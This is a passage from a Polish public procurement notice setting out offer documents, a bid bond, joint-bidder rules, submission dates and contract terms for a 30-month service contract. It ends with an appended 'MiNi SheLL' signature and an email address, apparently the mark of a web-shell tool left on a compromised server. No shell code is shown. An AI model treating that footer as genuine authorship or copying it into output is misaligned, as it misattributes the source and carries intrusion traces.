wypełniony i podpisany przez osobę uprawnioną „Formularz oferty” – wg Załącznika nr 1 do SWZ;<br/>2) oświadczenia i dokumenty, o których mowa w Rozdziale 7 ust. 2 i 3 SWZ:<br/>a) Oświadczenie, wg wzoru stanowiącego załącznik nr 4 (nr 7 jeżeli dotyczy) do SWZ, o niepodleganiu wykluczeniu oraz<br/>spełnianiu warunków udziału w postępowaniu,<br/>b) Dokumenty rejestrowe / pełnomocnictwo,<br/>c) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w rozdz. 6 ust. 8 SWZ<br/>(jeżeli dotyczy),<br/>d) Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w rozdz. 6 ust. 4 i 5 (jeśli dotyczy),<br/>e) Zastrzeżenie tajemnicy przedsiębiorstwa, o którym mowa w rozdz. 11 ust. 8 (jeżeli dotyczy),<br/>f) Dokumenty przedmiotowe: wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, składany w celu oceny oferty z zastosowaniem kryteriów oceny ofert (załącznik nr 8 do SWZ),<br/>g) Dokument ustanowienia wadium - zgodnie z rozdz. 9 SWZ,<br/>h) Oświadczenie w przedmiocie braku podstaw wykluczenia na podstawie art. 7 ust. 1 pkt 1-3 ustawy sankcyjnej.<br/>3) informacje o których mowa w Rozdziale 13 ust. 11 SWZ (jeżeli dotyczy).<br/>Szczegóły w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości: 5 024.25 PLN <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy występujący wspólnie<br/>są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Dokument pełnomocnictwa, z treści<br/>którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych Wykonawców<br/>należy załączyć do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki określone w rozdziale 6 ust. 2<br/>musi spełniać co najmniej jeden Wykonawca samodzielnie lub wszyscy Wykonawcy łącznie. W odniesieniu do warunków<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takim wypadku, wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>wykonawcy.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu<br/>oraz spełnianiu warunków udziału w postępowaniu, składa każdy z każdy spośród Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do umowy w sprawie zamówienia publicznego – wzór umowy zawarty jest w załączniku nr 3 do SWZ.<br/>2.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w przypadkach opisanych w projektowanych postanowieniach umowy (załącznik nr 3 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Drogą elektroniczną za pośrednictwem: https://e-propublico.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-16 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamawiający zawrze umowę w sprawie zamówienia publicznego z Wykonawcą, którego oferta zostanie uznana za najkorzystniejszą, w terminach określonych w art. 308 ust. 2 lub 3 ustawy Pzp. <br/>2.	Wykonawca będzie zobowiązany do podpisania umowy w miejscu i terminie wskazanym przez Zamawiającego.<br/>3.	Wybrany w drodze niniejszego postępowania Wykonawca winien przed podpisaniem umowy złożyć Zamawiającemu: <br/>1)	informacje niezbędne do wypełnienia treści umowy na wezwanie Zamawiającego;<br/>2)	pełnomocnictwo, chyba że dokumentach postępowania znajdują się dokumenty lub pełnomocnictwa upoważaniające osoby lub osobę do podpisania umowy w sprawie udzielenia zamówienia publicznego w imieniu Wykonawcy lub w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego;<br/>3)	ewentualny wykaz podwykonawców.<br/>4.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, <br/>są zobowiązani przedstawić Zamawiającemu kopię umowy regulującej współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5.	Zgodnie z art. 462 ust. 3 ustawy Pzp, w przypadku zamówienia na usługi, które mają być wykonane w miejscu podlegającym bezpośredniemu nadzorowi Zamawiającego, Zamawiający żąda, aby przed przystąpieniem do wykonania zamówienia Wykonawca podał nazwy, dane kontaktowe oraz przedstawicieli, podwykonawców zaangażowanych w takie usługi, jeżeli są już znani. Wykonawca zawiadamia Zamawiającego o wszelkich zmianach w odniesieniu do informacji, o których mowa w zdaniu 1, w trakcie realizacji zamówienia, a także przekazuje wymagane informacje na temat nowych podwykonawców, którym w późniejszym okresie zamierza powierzyć realizację usług.<br/>6.	Niedopełnienie ww. formalności, nieprzedłożenie ww. dokumentów przez Wykonawcę w wyznaczonym przez Zmawiającego terminie, przed podpisaniem umowy, rozumiane będzie przez Zamawiającego, jako uchylanie się przez Wykonawcę od zawarcia Umowy oraz będzie potraktowane przez Zamawiającego jako niemożność zawarcia umowy <br/>w sprawie zamówienia publicznego z przyczyn leżących po stronie Wykonawcy.<br/>7. Usługa będzie świadczona w sposób ciągły przez 30 miesięcy, licząc od dnia następnego po dniu podpisania umowy, ale nie wcześniej niż od dnia 01.01.2023 r., a przy skorzystaniu przez Zamawiającego z prawa opcji może być przedłużona maksymalnie o 12 miesięcy.<br/>8. Zamawiający wykluczy z postępowania Wykonawcę wobec którego zachodzą przesłanki określone w art. 7 ust. 1 pkt 1-3<br/>ustawy sankcyjnej. Wykluczenie Wykonawcy następuje na okres trwania okoliczności określonych w art. 7 ust. 1 pkt 1-3<br/>ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego.<br/>9. Szczegóły w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com